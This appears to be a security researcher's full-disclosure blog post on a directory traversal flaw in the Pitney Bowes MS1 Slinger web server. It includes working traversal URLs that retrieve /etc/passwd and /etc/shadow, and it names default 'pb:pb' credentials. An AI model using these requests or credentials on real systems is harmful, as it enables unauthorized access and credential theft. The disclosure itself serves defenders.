pitney bowes

All posts tagged pitney bowes

We have been trying to contact Pitney Bowes for ten months to report a security issue. After multiple attempts using email and twitter we decided to release the vulnerability to the public so that companies can protect themselves. One of the main driving factors behind this was when we found out that Pitney Bowes sells security services to other companies.
We strongly believe in responsible disclosure and we also believe that if you sell security services you should be responsive to other researchers reporting issues in your products. While the directory traversal is serious it also exposes weak default credentials which may work on other Pitney Bowes products.


Pitney Bowes MS1 Slinger Web Server Directory Traversal

Known Vulnerable Version
scversion=05.00.0021
AppScSchema=01.12.0005.0000

Proof of Concept

  1. The Slinger web service listens on TCP port 8008
  2. Retrieve etc/passwd: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  3. Retrieve etc/shadow: http://<IP>:8008/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
  4. The default credentials are pb:pb